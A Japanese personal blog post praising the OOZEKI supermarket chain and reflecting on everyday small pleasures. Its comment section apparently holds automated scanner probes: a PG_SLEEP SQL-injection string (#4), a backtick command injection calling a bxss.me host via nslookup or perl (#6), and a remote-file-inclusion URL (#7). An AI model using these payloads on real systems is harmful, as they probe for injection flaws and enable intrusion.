オオゼキ

大好きなスーパーマーケットが二つ離れた駅にある。「OOZEKI」という名のチェーン店。38店舗あるらしい。そもそも、スーパーマーケットに行くのが、子どもの頃から好きだった。親につれられて、どの納豆がいいのか、どの豆腐がいいのか、肉は同じにみえるな、やっぱりお菓子だな、買ってくれないな、、などと瞬間事に想像しながら、目をキョロキョロさせながら。オトナになった今、活気のある、店内を何も考えずに通り抜ける瞬間瞬間が好きだ。だいたい目がとまる棚はいつもほぼ同じ。ゆっくりとした気分のときは、いろんな食材や商品が目に留まる。『買いすぎ注意!』がアタマにあるからか、掘り下げて見ないようにしている。特に野菜や魚は目立つ。えぐい魚もいるし、めちゃくちゃ整った野菜もいてスーパーマーケット内のエース。「OOZEKI」は、なんといっても生鮮食品が豊かで、レジサービスが優しい(袋に入れてくれたり、挨拶が徹底)。そして雰囲気が明るい。なるべく町の八百屋さんや魚屋さんを応援したいのだが、生鮮食品・人情味・活気が揃われてしまえば、ね。。

遠くの目標も大事だけど、近くの豊かさも捨てがたい。見落としがちだった、心揺さぶられる、心に栄養が募る景色ややりとりを、発見し、毎日に取り入れる。そういったものを、途中経過で評価することのは、とても難しいことも知っているが、なるべく見失わないようにやっていきたい意思がある。長きに渡り大きなもや派手な物に目が眩んできた。憧れでもあるし、時に道しるべにもなった。小さいなことの積む重ねが大きくなる、ということが胸に響く。ギターもそう、食べることやスポーツもそう。毎日の喜びを真正面から探す。オリンピックも最大の瞬間祭だ。やっぱり一番好きなのは寝ることか。

コメントをお書きください

コメント: 15
  • #1

    kXvrbKwH (金曜日, 08 10月 2021 11:42)

    1

  • #2

    kXvrbKwH (金曜日, 08 10月 2021 11:45)

    1

  • #3

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    1

  • #4

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    -5) OR 934=(SELECT 934 FROM PG_SLEEP(15))--

  • #5

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    1

  • #6

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    `(nslookup hitfgcbzyfyxub7ac3.bxss.me||perl -e "gethostbyname('hitfgcbzyfyxub7ac3.bxss.me')")`

  • #7

    Http://bxss.me/t/fit.txt (金曜日, 08 10月 2021 11:46)

    1

  • #8

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    1

  • #9

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    1

  • #10

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    1

  • #11

    kXvrbKwH (金曜日, 08 10月 2021 11:46)

    1

  • #12

    kXvrbKwH (金曜日, 08 10月 2021 11:47)

    1

  • #13

    kXvrbKwH (金曜日, 08 10月 2021 11:48)

    1

  • #14

    kXvrbKwH (金曜日, 08 10月 2021 11:48)

    1

  • #15

    kXvrbKwH (金曜日, 08 10月 2021 13:05)

    1